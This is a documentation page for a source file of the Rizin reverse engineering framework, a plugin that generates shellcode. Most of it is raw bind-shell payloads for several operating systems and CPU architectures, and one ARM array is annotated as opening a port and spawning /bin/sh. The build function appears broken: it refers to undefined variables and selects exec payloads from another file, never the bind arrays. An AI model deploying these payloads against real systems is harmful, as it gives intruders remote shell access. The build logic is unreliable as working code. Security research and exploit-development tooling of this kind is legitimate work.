Rizin
unix-like reverse engineering framework and cli tools
egg_bind.c
Go to the documentation of this file.
1 // SPDX-FileCopyrightText: 2013 pancake <pancake@nopcode.org>
2 // SPDX-License-Identifier: LGPL-3.0-only
3 
4 #include <rz_egg.h>
5 
6 static unsigned char x86_osx_bind4444[] =
7  "\x33\xc9\x83\xe9\xea\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"
8  "\x7e\x85\xb4\x83\xeb\xfc\xe2\xf4\xaf\x3c\xdd\x79\x45\x14\xe4\xec"
9  "\x5c\x2c\xed\xa4\xc7\x6f\xd9\x3d\x24\x2c\xc7\xe6\x87\x2c\xef\xa4"
10  "\x08\xfe\x1c\x27\x94\x2d\xd7\xde\xad\x26\x48\x34\x75\x14\x48\x34"
11  "\x97\x2d\xd7\x04\xdb\xb3\x05\x23\xaf\x7c\xdc\xde\x9f\x26\xd4\xe3"
12  "\x94\xb3\x05\xfd\xca\xf7\x74\x4b\x3a\x81\xd5\xdc\xea\x51\xf6\xdc"
13  "\xad\x51\xe7\xdd\xab\xf7\x66\xe4\x91\x2a\xd6\xe7\x75\x45\x48\x34";
14 
15 static unsigned char x86_solaris_bind4444[] =
16  "\x31\xc9\x83\xe9\xe8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
17  "\x08\x0b\x8d\x83\xeb\xfc\xe2\xf4\x87\xf7\xf3\x72\x03\xff\xdb\xdd"
18  "\x0e\xc8\xbb\x17\x6f\x81\xee\xbc\xf6\x59\x4a\xcc\x6e\x59\xbb\x6b"
19  "\xc0\xdd\x3a\x5f\xb6\xcf\x59\xeb\x57\x19\x57\xeb\x6e\x81\xed\xe7"
20  "\x2f\x5e\x5c\x3d\xd7\xf7\xde\x3d\xd6\xf7\xde\xdd\x6f\x5f\xbb\x67"
21  "\xc0\xdd\x3a\x5f\x8d\x01\x5a\xdf\x6f\xb8\x35\x72\xea\x41\x72\x7f"
22  "\x6f\x60\x24\xa2\x4c\x60\x63\xa2\x5d\x61\x65\x04\xdc\x58\x58\x04"
23  "\xdd\x58\x59\xde\x8f\x33\xf4\x58";
24 
25 // port must be configurable
26 static long x86_openbsd_bind6969[] = { // 391b
27  0x4151c931, 0x51514151, 0x61b0c031, 0x078980cd, 0x4f88c931, 0x0547c604, 0x084f8902,
28  0x0647c766, 0x106a391b, 0x5004478d, 0x5050078b, 0x68b0c031, 0x016a80cd, 0x5050078b,
29  0x6ab0c031, 0xc93180cd, 0x078b5151, 0xc0315050, 0x80cd1eb0, 0xc9310789, 0x50078b51,
30  0xb0c03150, 0x4180cd5a, 0x7503f983, 0x5b23ebef, 0xc9311f89, 0x89074b88, 0x8d51044f,
31  0x078b5007, 0xc0315050, 0x80cd3bb0, 0x5151c931, 0x01b0c031, 0xd8e880cd, 0x2fffffff,
32  0x2f6e6962, 0x90416873
33 };
34 
35 static unsigned char x86_linux_bind4444[] =
36  "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x81\x9c\x95"
37  "\xe9\x83\xeb\xfc\xe2\xf4\xb0\x47\xc6\xaa\xd2\xf6\x97\x83\xe7\xc4\x0c\x60"
38  "\x60\x51\x15\x7f\xc2\xce\xf3\x81\x90\xc0\xf3\xba\x08\x7d\xff\x8f\xd9\xcc"
39  "\xc4\xbf\x08\x7d\x58\x69\x31\xfa\x44\x0a\x4c\x1c\xc7\xbb\xd7\xdf\x1c\x08"
40  "\x31\xfa\x58\x69\x12\xf6\x97\xb0\x31\xa3\x58\x69\xc8\xe5\x6c\x59\x8a\xce"
41  "\xfd\xc6\xae\xef\xfd\x81\xae\xfe\xfc\x87\x08\x7f\xc7\xba\x08\x7d\x58\x69\x00";
42 
43 // TODO: UDP support
44 static unsigned char x86_linux_udp4444[] =
45  "\x33\xc9\x83\xe9\xe7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13\xec\x81"
46  "\xca\x83\xeb\xfc\xe2\xf4\x22\x37\xd2\xa0\x11\x86\x83\x89\x79\x8a\xd9\x43"
47  "\xf2\x21\x01\x59\x4a\x5c\xbe\x07\x93\xa5\xf8\x33\x48\xb6\xe9\xb5\x13\xec"
48  "\x80\xac\x7b\xfd\xdd\xac\x40\x65\x60\xa0\x03\xbd\xd2\x43\xf2\xaf\x31\xac"
49  "\xde\x6c\xeb\xc1\x4b\xbe\xe7\xa2\x3e\x85\x08\x2b\x79\x8b\xe7\xa2\x7a\x82"
50  "\xe9\xaf\x77\x85\xf5\xa2\x3e\xc1\xef\xa5\x9a\x0b\xd3\xa2\x3c\xc3\xf2\xa2"
51  "\x7b\xc3\xe3\xa3\x7d\x65\x62\x98\x42\xbb\xd2\x43\xf2\x21\x01\xca\x00";
52 
53 static char arm_linux_bind[] =
54  "\x20\x60\x8f\xe2" /* add r6, pc, #32 */
55  "\x07\x70\x47\xe0" /* sub r7, r7, r7 */
56  "\x01\x70\xc6\xe5" /* strb r7, [r6, #1] */
57  "\x01\x30\x87\xe2" /* add r3, r7, #1 */
58  "\x13\x07\xa0\xe1" /* mov r0, r3, lsl r7 */
59  "\x01\x20\x83\xe2" /* add r2, r3, #1 */
60  "\x07\x40\xa0\xe1" /* mov r4, r7 */
61  "\x0e\xe0\x4e\xe0" /* sub lr, lr, lr */
62  "\x1c\x40\x2d\xe9" /* stmfd sp!, {r2-r4, lr} */
63  "\x0d\x10\xa0\xe1" /* mov r1, sp */
64  "\x66\xff\x90\xef" /* swi 0x90ff66 (socket) */
65  "\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */
66  "\x35\x70\xc6\xe5" /* strb r7, [r6, #53] */
67  "\x14\x20\xa0\xe3" /* mov r2, #20 */
68  "\x82\x28\xa9\xe1" /* mov r2, r2, lsl #17 */
69  "\x02\x20\x82\xe2" /* add r2, r2, #2 */
70  "\x14\x40\x2d\xe9" /* stmfd sp!, {r2,r4, lr} */
71  "\x10\x30\xa0\xe3" /* mov r3, #16 */
72  "\x0d\x20\xa0\xe1" /* mov r2, sp */
73  "\x0d\x40\x2d\xe9" /* stmfd sp!, {r0, r2, r3, lr} */
74  "\x02\x20\xa0\xe3" /* mov r2, #2 */
75  "\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
76  "\x0d\x10\xa0\xe1" /* mov r1, sp */
77  "\x66\xff\x90\xef" /* swi 0x90ff66 (bind) */
78  "\x45\x70\xc6\xe5" /* strb r7, [r6, #69] */
79  "\x02\x20\x82\xe2" /* add r2, r2, #2 */
80  "\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
81  "\x66\xff\x90\xef" /* swi 0x90ff66 (listen) */
82  "\x5d\x70\xc6\xe5" /* strb r7, [r6, #93] */
83  "\x01\x20\x82\xe2" /* add r2, r2, #1 */
84  "\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
85  "\x04\x70\x8d\xe5" /* str r7, [sp, #4] */
86  "\x08\x70\x8d\xe5" /* str r7, [sp, #8] */
87  "\x66\xff\x90\xef" /* swi 0x90ff66 (accept) */
88  "\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */
89  "\x02\x10\xa0\xe3" /* mov r1, #2 */
90  "\x71\x70\xc6\xe5" /* strb r7, [r6, #113] */
91  "\x15\x07\xa0\xe1" /* mov r0, r5, lsl r7 <dup2> */
92  "\x3f\xff\x90\xef" /* swi 0x90ff3f (dup2) */
93  "\x01\x10\x51\xe2" /* subs r1, r1, #1 */
94  "\xfb\xff\xff\x5a" /* bpl <dup2> */
95  "\x99\x70\xc6\xe5" /* strb r7, [r6, #153] */
96  "\x14\x30\x8f\xe2" /* add r3, pc, #20 */
97  "\x04\x30\x8d\xe5" /* str r3, [sp, #4] */
98  "\x04\x10\x8d\xe2" /* add r1, sp, #4 */
99  "\x02\x20\x42\xe0" /* sub r2, r2, r2 */
100  "\x13\x02\xa0\xe1" /* mov r0, r3, lsl r2 */
101  "\x08\x20\x8d\xe5" /* str r2, [sp, #8] */
102  "\x0b\xff\x90\xef" /* swi 0x900ff0b (execve) */
103  "/bin/sh";
104 
105 static unsigned char sparc_linux_bind4444[] =
106  "\x23\x2d\x57\xbb\xa2\x14\x63\xd5\x20\xbf\xff\xff\x20\xbf\xff\xff"
107  "\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\xea\x23\xe0\x20"
108  "\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x9e\x03\xe0\x04"
109  "\x29\x75\x4f\xd2\xf1\x9a\xaf\xde\x61\x8a\x8f\xdf\x61\x89\x70\x2b"
110  "\xb1\xed\x30\x2b\xf1\xd1\xf0\x37\x60\x35\xaf\xcb\x06\x29\x8f\x1d"
111  "\x97\x99\xf0\xb1\x3c\x3a\x50\x91\x9a\x2d\xb0\xc1\x32\x6e\x0f\x15"
112  "\x54\x4a\xcf\x2d\xb1\xad\x30\x49\x69\xb8\x10\x0d\xc3\xdf\x12\xb8"
113  "\xfb\xe4\x2d\x22\x6c\x0b\x72\xa0\x1d\xfb\x52\xb4\xbf\xeb\xb2\xb5"
114  "\x22\x28\x0d\x4d\x32\x3f\x52\xa9\xa3\xef\xb2\xa1\x04\x2c\x0d\x39"
115  "\x44\x10\xcd\x45\xd4\x47\x12\xb0\x45\xb7\x72\xaa\xb6\x14\xcd\x3e"
116  "\xa4\x4b\x12\xbd\x5a\xc9\x32\xc0\xd9\x1d\x92\x98\x4c\xcd\xf3\x0c"
117  "\x7c\x52\x0c\xd1\x51\xae\x4c\xdd\xc5\xab\x73\x16\xc4\xc7\xab\xb2"
118  "\xa6\xcc\x6a\xac\x85\xe7\xb1\xea\x59\xdb\xea\x1a\xc8\x38\x4a\x12"
119  "\x0c\x04\x35\xd2\x1c\x58\xf5\xea\x5c\xbc\xb5\xf6\xde\xd2\xea\x3d"
120  "\x4f\x02\xca\x49\x70\xa3\x0a\x49";
121 
122 static unsigned char x86_w32_tcp4444[] =
123  "\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7a"
124  "\xba\xcb\x13\x83\xeb\xfc\xe2\xf4\x86\xd0\x20\x5e\x92\x43\x34\xec"
125  "\x85\xda\x40\x7f\x5e\x9e\x40\x56\x46\x31\xb7\x16\x02\xbb\x24\x98"
126  "\x35\xa2\x40\x4c\x5a\xbb\x20\x5a\xf1\x8e\x40\x12\x94\x8b\x0b\x8a"
127  "\xd6\x3e\x0b\x67\x7d\x7b\x01\x1e\x7b\x78\x20\xe7\x41\xee\xef\x3b"
128  "\x0f\x5f\x40\x4c\x5e\xbb\x20\x75\xf1\xb6\x80\x98\x25\xa6\xca\xf8"
129  "\x79\x96\x40\x9a\x16\x9e\xd7\x72\xb9\x8b\x10\x77\xf1\xf9\xfb\x98"
130  "\x3a\xb6\x40\x63\x66\x17\x40\x53\x72\xe4\xa3\x9d\x34\xb4\x27\x43"
131  "\x85\x6c\xad\x40\x1c\xd2\xf8\x21\x12\xcd\xb8\x21\x25\xee\x34\xc3"
132  "\x12\x71\x26\xef\x41\xea\x34\xc5\x25\x33\x2e\x75\xfb\x57\xc3\x11"
133  "\x2f\xd0\xc9\xec\xaa\xd2\x12\x1a\x8f\x17\x9c\xec\xac\xe9\x98\x40"
134  "\x29\xf9\x98\x50\x29\x45\x1b\x7b\x7a\xba\xcb\x13\x1c\xd2\xda\x4f"
135  "\x1c\xe9\x42\xf2\xef\xd2\x27\xea\xd0\xda\x9c\xec\xac\xd0\xdb\x42"
136  "\x2f\x45\x1b\x75\x10\xde\xad\x7b\x19\xd7\xa1\x43\x23\x93\x07\x9a"
137  "\x9d\xd0\x8f\x9a\x98\x8b\x0b\xe0\xd0\x2f\x42\xee\x84\xf8\xe6\xed"
138  "\x38\x96\x46\x69\x42\x11\x60\xb8\x12\xc8\x35\xa0\x6c\x45\xbe\x3b"
139  "\x85\x6c\x90\x44\x28\xeb\x9a\x42\x10\xbb\x9a\x42\x2f\xeb\x34\xc3"
140  "\x12\x17\x12\x16\xb4\xe9\x34\xc5\x10\x45\x34\x24\x85\x6a\xa3\xf4"
141  "\x03\x7c\xb2\xec\x0f\xbe\x34\xc5\x85\xcd\x37\xec\xaa\xd2\x3b\x99"
142  "\x7e\xe5\x98\xec\xac\x45\x1b\x13";
143 
144 static RzBuffer *build(RzEgg *egg) {
145  RzBuffer *buf = rz_buf_new_with_bytes(NULL, 0);
146  const ut8 *sc = NULL;
147  int cd = 0;
148  char *port = rz_egg_option_get(egg, "port");
149  // TODO: char *udp = rz_egg_option_get (egg, "udp");
150  switch (egg->os) {
151  case RZ_EGG_OS_OSX:
152  case RZ_EGG_OS_DARWIN:
153  switch (egg->arch) {
154  case RZ_SYS_ARCH_X86:
155  if (suid) {
156  sc = x86_osx_suid_binsh;
157  cd = 7 + 36;
158  } else {
159  sc = x86_osx_binsh;
160  cd = 36;
161  }
162  case RZ_SYS_ARCH_ARM:
163  // TODO
164  break;
165  }
166  break;
167  case RZ_EGG_OS_LINUX:
168  if (suid)
169  eprintf("no suid for this platform\n");
170  suid = 0;
171  switch (egg->arch) {
172  case RZ_SYS_ARCH_X86:
173  switch (egg->bits) {
174  case 32: sc = x86_linux_binsh; break;
175  case 64: sc = x86_64_linux_binsh; break;
176  default: eprintf("Unsupportted\n");
177  }
178  break;
179  case RZ_SYS_ARCH_ARM:
180  sc = arm_linux_binsh;
181  break;
182  }
183  break;
184  default:
185  eprintf("unsupported os %x\n", egg->os);
186  break;
187  }
188  if (sc) {
189  rz_buf_set_bytes(buf, sc, strlen((const char *)sc));
190  if (shell && *shell) {
191  if (cd)
192  rz_buf_write_at(buf, cd, (const ut8 *)shell, strlen(shell) + 1);
193  else
194  eprintf("Cannot set shell\n");
195  }
196  }
197  free(suid);
198  free(shell);
199  return buf;
200 }
201 
202 // TODO: rename plugin to run
203 RzEggPlugin rz_egg_plugin_bind = {
204  .name = "bind",
205  .type = RZ_EGG_PLUGIN_SHELLCODE,
206  .desc = "listen port=4444",
207  .build = (void *)build
208 };
209 
210 #ifndef RZ_PLUGIN_INCORE
211 RZ_API RzLibStruct rizin_plugin = {
212  .type = RZ_LIB_TYPE_EGG,
213  .data = &rz_egg_plugin_bind,
214  .version = RZ_VERSION
215 };
216 #endif
cd
static csh cd
Definition: asm_mips_cs.c:10
RZ_API
#define RZ_API
Definition: core_plugin_example.c:36
NULL
#define NULL
Definition: cris-opc.c:27
rz_egg_option_get
RZ_API char * rz_egg_option_get(RzEgg *egg, const char *key)
Definition: egg.c:534
x86_openbsd_bind6969
static long x86_openbsd_bind6969[]
Definition: egg_bind.c:26
x86_osx_bind4444
static unsigned char x86_osx_bind4444[]
Definition: egg_bind.c:6
arm_linux_bind
static char arm_linux_bind[]
Definition: egg_bind.c:53
x86_linux_bind4444
static unsigned char x86_linux_bind4444[]
Definition: egg_bind.c:35
x86_solaris_bind4444
static unsigned char x86_solaris_bind4444[]
Definition: egg_bind.c:15
build
static RzBuffer * build(RzEgg *egg)
Definition: egg_bind.c:144
rizin_plugin
RZ_API RzLibStruct rizin_plugin
Definition: egg_bind.c:211
rz_egg_plugin_bind
RzEggPlugin rz_egg_plugin_bind
Definition: egg_bind.c:203
x86_w32_tcp4444
static unsigned char x86_w32_tcp4444[]
Definition: egg_bind.c:122
sparc_linux_bind4444
static unsigned char sparc_linux_bind4444[]
Definition: egg_bind.c:105
x86_linux_udp4444
static unsigned char x86_linux_udp4444[]
Definition: egg_bind.c:44
sc
static char sc[]
Definition: egg_cb.c:6
x86_64_linux_binsh
static ut8 x86_64_linux_binsh[]
Definition: egg_exec.c:46
x86_linux_binsh
static ut8 x86_linux_binsh[]
Definition: egg_exec.c:34
x86_osx_suid_binsh
static ut8 x86_osx_suid_binsh[]
Definition: egg_exec.c:18
x86_osx_binsh
static ut8 x86_osx_binsh[]
Definition: egg_exec.c:25
arm_linux_binsh
static ut8 arm_linux_binsh[]
Definition: egg_exec.c:49
free
RZ_API void Ht_() free(HtName_(Ht) *ht)
Definition: ht_inc.c:130
buf
voidpf void * buf
Definition: ioapi.h:138
ut8
uint8_t ut8
Definition: lh5801.h:11
eprintf
#define eprintf(x, y...)
Definition: rlcc.c:7
rz_buf_write_at
RZ_API st64 rz_buf_write_at(RZ_NONNULL RzBuffer *b, ut64 addr, RZ_NONNULL const ut8 *buf, ut64 len)
Write len bytes of the buffer at the specified address.
Definition: buf.c:1197
rz_buf_set_bytes
RZ_API bool rz_buf_set_bytes(RZ_NONNULL RzBuffer *b, RZ_NONNULL const ut8 *buf, ut64 len)
Replace the content of the buffer with the bytes array.
Definition: buf.c:905
rz_buf_new_with_bytes
RZ_API RZ_OWN RzBuffer * rz_buf_new_with_bytes(RZ_NULLABLE RZ_BORROW const ut8 *bytes, ut64 len)
Creates a new buffer with a bytes array.
Definition: buf.c:465
rz_egg.h
RZ_EGG_PLUGIN_SHELLCODE
#define RZ_EGG_PLUGIN_SHELLCODE
Definition: rz_egg.h:19
RZ_EGG_OS_DARWIN
#define RZ_EGG_OS_DARWIN
Definition: rz_egg.h:129
RZ_EGG_OS_OSX
#define RZ_EGG_OS_OSX
Definition: rz_egg.h:128
RZ_EGG_OS_LINUX
#define RZ_EGG_OS_LINUX
Definition: rz_egg.h:127
RZ_LIB_TYPE_EGG
@ RZ_LIB_TYPE_EGG
Definition: rz_lib.h:84
RZ_SYS_ARCH_X86
@ RZ_SYS_ARCH_X86
Definition: rz_types.h:532
RZ_SYS_ARCH_ARM
@ RZ_SYS_ARCH_ARM
Definition: rz_types.h:533
RZ_VERSION
#define RZ_VERSION
Definition: rz_version.h:8
rz_buf_t
Definition: rz_buf.h:43
rz_egg_plugin_t
Definition: rz_egg.h:22
rz_egg_plugin_t::name
const char * name
Definition: rz_egg.h:23
rz_egg_t
Definition: rz_egg.h:93
rz_egg_t::bits
int bits
Definition: rz_egg.h:108
rz_egg_t::arch
int arch
Definition: rz_egg.h:106
rz_egg_t::os
ut32 os
Definition: rz_egg.h:109
rz_lib_struct_t
Definition: rz_lib.h:57
rz_lib_struct_t::type
int type
Definition: rz_lib.h:58